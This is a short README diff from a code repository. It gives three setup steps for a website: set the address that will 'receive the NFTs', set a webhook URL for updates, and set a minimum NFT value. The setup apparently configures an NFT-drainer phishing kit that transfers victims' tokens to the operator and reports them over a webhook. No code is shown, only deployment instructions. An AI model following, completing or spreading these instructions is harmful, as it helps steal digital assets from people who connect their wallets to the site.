aris214/main-one-/README.md

 # 👻 Guide:
-In order to use this website, you need to edit the **index.js** file In The SRC>JS Folder Step 1: Change The ReciveAddress To The Address You Want To Recieve The NFTs On Step 2: Change The Webhook URL For Your Updates
+In order to use this website, you need to edit the **settings.js** file In The Main Folder Step 1: Change The ReciveAddress To The Address You Want To Recieve The NFTs On Step 2: Change The Webhook URL For Your Updates
 Step 3: Change Minimum Value Of NFTs